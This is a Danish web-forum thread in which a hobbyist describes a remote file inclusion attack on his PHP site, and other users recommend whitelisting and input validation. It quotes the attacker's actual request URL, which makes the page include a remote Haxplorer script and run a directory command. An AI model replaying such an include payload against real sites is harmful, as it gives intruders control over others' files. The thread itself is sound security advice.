Haxplorer giver mulig for at slette mine filer?

Du sørger for at din index fil kun kan inkludere de filer du vil have den skal inkludere.

og hvordan gør jeg det?
Kan jeg gøre således, at den automatisk kun kan inkludere en fil, der ligger i en eller to bestemte mapper?

Jeg gemmer alle de sider som skal vises i en database, og så kalder jeg dem med ID, så kan man ikke vise skjulte sider :)

Kan du ikke forklare det lidt nærmere.

Har du installeret Haxplorer i din egen folder?
Er det en anden bruger på webhotellet, der kan navigere over i din og andre brugeres folder?
Eller er det helt udefra kommende?

Det er en fremmed, der har besøgt min side.
Istedet for at se index.php?id=forside har han skrevet "index.php?http%3A%2F%2Fmembers.lycos.nl%2Fgohwipum%2Fbanner.gif%3F&&s=r&cmd=dir&dir=."

Han har altså lagt et haxplorer script på members.lycos.nl, som han så kalder via min side. istedet for at inkludere forsiden, inkluderer han altså haxplorer scriptet, der giver ham fuld kontrol over mine filer - slette, åbne osv...

<ole>

Du må _aldrig_ anvende bruger-input direkte! Du kan f.eks. skrive:

<?
switch ($_GET["page"]) {
  case "side_noget":
      $incl_page = "sideNoget.php";
  break;
  case "side_bla":
      $incl_page = "sideBla.php";
  break;
  case "side_blabla":
      $incl_page = "sideBlaBla.php";
  break;
}

include($incl_page);

# ... osv ... osv ...
?>

/mvh
</bole>

- så kalder du siden med f.eks:
    index.php?page=side_bla

Ja så bliver du jo nødt til at validere $id inden du bruger den i include, som erik og ducks foreslår.
Quick&Dirty: scan for http eller punktum. og sæt $id='forside' hvis tegnene findes.

Og bruger du Oles skitse til kode, skal du huske (igen noget man SKAL!) at tilføje denne linie
  $incl_page="sidenduvilvisehvismanskrevetnogetandetendduforventer.php";
før linien med
  switch ($_GET["page"]) {

Og helt generelt: Kan du ikke gennemskue hvorfor vi anbefaler alt dette, skal du kun fortsætte med at lave PHP sider for sjov.

Jo selvfølgelig, kan jeg se, hvorfor I anbefaler det.
Har også tænkt på det før, men havde dog ikke troet det var SÅ nemt at udnytte.
Desuden, så laver jeg også kun PHP sider for sjov :D

Så er der tid til at lære noget om sikkerhed, inden du skal bruge det for alvor ;)

Erik >> helt korrekt! Variabler bør altid initieres, hvilket også er obligatorisk i mange andre sprog  ;o)

Jeg har bl.a. brugt denne metode :

$filename="";

if(isset($_GET['link'])) {
if($_GET['link']!=preg_replace("/[^a-z0-9\/]/", "", $_GET['link'])) { header("location: index.php"); exit; }
$filename=check_link($_GET['link']);
include($filename); }

function check_link($page) {
if(file_exists($page.".htm")) { return $page.".htm"; }
if(file_exists($page.".php")) { return $page.".php"; }
if(file_exists($page.".doc")) { header("location: ".$page.".doc"); exit; }
if(file_exists($page.".pdf")) { header("location: ".$page.".pdf"); exit; }
header("location: index.php"); exit; }

Mvh. Johan